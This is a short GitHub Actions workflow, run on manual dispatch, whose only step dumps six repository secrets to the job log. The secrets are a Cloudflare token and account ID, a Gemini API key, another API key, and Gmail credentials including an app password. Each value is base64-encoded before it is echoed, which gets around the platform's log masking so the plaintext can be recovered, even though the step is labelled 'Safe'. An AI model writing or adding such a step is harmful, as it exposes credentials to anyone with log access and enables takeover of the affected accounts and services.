name: Export Secrets Temporary

on:
  workflow_dispatch:

jobs:
  export:
    runs-on: ubuntu-24.04
    steps:
      - name: Export Secrets Safe
        run: |
          echo "START_SECRET_DUMP"
          echo "CF_TOKEN: $(echo -n "${{ secrets.CLOUDFLARE_API_TOKEN }}" | base64 -w 0)"
          echo "CF_ACCOUNT: $(echo -n "${{ secrets.CLOUDFLARE_ACCOUNT_ID }}" | base64 -w 0)"
          echo "GEMINI_KEY: $(echo -n "${{ secrets.GEMINI_API_KEY }}" | base64 -w 0)"
          echo "PUBLIC_KEY: $(echo -n "${{ secrets.PUBLIC_DATA_API_KEY }}" | base64 -w 0)"
          echo "GMAIL_USER: $(echo -n "${{ secrets.GMAIL_USER }}" | base64 -w 0)"
          echo "GMAIL_PASS: $(echo -n "${{ secrets.GMAIL_APP_PASSWORD }}" | base64 -w 0)"
          echo "END_SECRET_DUMP"
